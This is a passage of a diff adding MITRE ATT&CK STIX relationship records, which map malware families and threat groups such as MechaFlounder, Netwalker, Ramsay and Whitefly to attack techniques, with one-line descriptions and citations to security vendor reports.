+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5ba68c4c-2ac8-4046-bcac-8a7e81e1bdcf",
+ "type": "relationship",
+ "modified": "2020-05-28T13:27:38.702Z",
+ "created": "2020-05-27T20:25:33.655Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b96089fa-ebca-4d3c-9290-473cb98ad577",
+ "type": "relationship",
+ "modified": "2020-05-27T20:25:33.657Z",
+ "created": "2020-05-27T20:25:33.657Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--08057442-4b2c-4841-b351-8813431704e9",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.640Z",
+ "created": "2020-05-27T20:25:33.659Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9d4d3bb6-58b7-4c16-a405-d576e8e96c07",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.637Z",
+ "created": "2020-05-27T20:25:33.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
+ "external_references": [
+ {
+ "source_name": "ClearSky Charming Kitten Dec 2017",
+ "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ }
+ ],
+ "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--cf9f6e3b-b029-4edd-b53d-7f5981bd2302",
+ "type": "relationship",
+ "modified": "2020-05-27T21:22:18.518Z",
+ "created": "2020-05-27T21:22:18.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used [Mimikatz](https://attack.mitre.org/software/S0002) to obtain credentials.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5ee2ba47-9b66-4a62-8bde-ff29409d4830",
+ "type": "relationship",
+ "modified": "2020-05-27T21:56:25.085Z",
+ "created": "2020-05-27T21:56:25.085Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2dd1c028-bebc-4631-b17b-3dd27a595c00",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.039Z",
+ "created": "2020-05-27T22:05:32.039Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed0e96e6-6b71-468a-9e76-477ed3765ca4",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.060Z",
+ "created": "2020-05-27T22:05:32.060Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dda9f6bb-eb66-422b-aa58-fede809b6a6a",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.062Z",
+ "created": "2020-05-27T22:05:32.062Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5ff771c3-7d1c-4d04-a81e-76e374951e72",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.076Z",
+ "created": "2020-05-27T22:05:32.076Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3967e156-2135-4416-b3c3-79372d19d610",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.362Z",
+ "created": "2020-05-27T22:05:32.099Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--553dc864-7d6b-41f9-bb1c-9fc6ee3724b7",
+ "type": "relationship",
+ "modified": "2020-05-28T13:54:18.976Z",
+ "created": "2020-05-28T13:27:38.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03341b9d-6848-4430-a868-b2bc61b357ba",
+ "type": "relationship",
+ "modified": "2020-05-28T13:54:18.982Z",
+ "created": "2020-05-28T13:27:38.673Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--21d94923-38bb-489d-bc6a-23e03fef7b91",
+ "type": "relationship",
+ "modified": "2020-05-28T14:00:25.604Z",
+ "created": "2020-05-28T14:00:25.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--80abde96-13dc-4551-9430-d8edddbba216",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.596Z",
+ "created": "2020-05-28T16:19:14.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for systems that are vulnerable to the EternalBlue exploit.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2c9fad15-9b3f-45fe-854a-c87113d4695c",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.545Z",
+ "created": "2020-05-28T16:38:03.660Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can detect system information to create a hardware profile GUID which acts as a system identifier for operators.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--81a857bb-4c36-4875-a62e-30e7b12eae12",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.600Z",
+ "created": "2020-05-28T16:38:03.684Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0428220b-eb98-45c3-a637-7da54b4496b4",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.056Z",
+ "created": "2020-05-28T16:38:03.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can compress and archive collected files using WinRAR.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--756f3884-c21b-4d00-ac2c-6c2ab386072f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.086Z",
+ "created": "2020-05-28T16:38:03.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can stage data prior to exfiltration in %APPDATA%\\Microsoft\\UserSetting and %APPDATA%\\Microsoft\\UserSetting\\MediaCache.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--4b03f718-f89a-4652-b3be-5cbe4e0e044f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.124Z",
+ "created": "2020-05-28T16:38:03.701Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for Microsoft Word documents within the target's filesystem.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cde9af4e-4bf9-4235-9d27-496eb78e3608",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.130Z",
+ "created": "2020-05-28T16:38:03.703Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6046634-68c8-4a9e-a58f-58fd8876346a",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.032Z",
+ "created": "2020-05-28T16:38:03.706Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect Microsoft Word documents from the target's filesystem.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--3feb6e83-0491-4e3d-a581-3f68ab839e92",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.175Z",
+ "created": "2020-05-28T16:38:03.710Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can scan for removable media which may contain documents for collection.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55d84559-7bb9-4e17-be60-7694e4219877",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.170Z",
+ "created": "2020-05-28T16:38:03.712Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can hijack outdated Windows application dependencies with malicious versions of its own DLL payload.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55e67f6b-600a-4196-b497-63019731e66e",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.651Z",
+ "created": "2020-05-28T16:38:03.754Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on removable drives.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c8f639f8-9717-485a-ad4c-7eb1fc771691",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.213Z",
+ "created": "2020-05-28T16:38:03.757Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic Scripts in malicious documents.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d9898b1f-9056-400c-9b26-26c87500cfe3",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.222Z",
+ "created": "2020-05-28T16:38:03.760Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
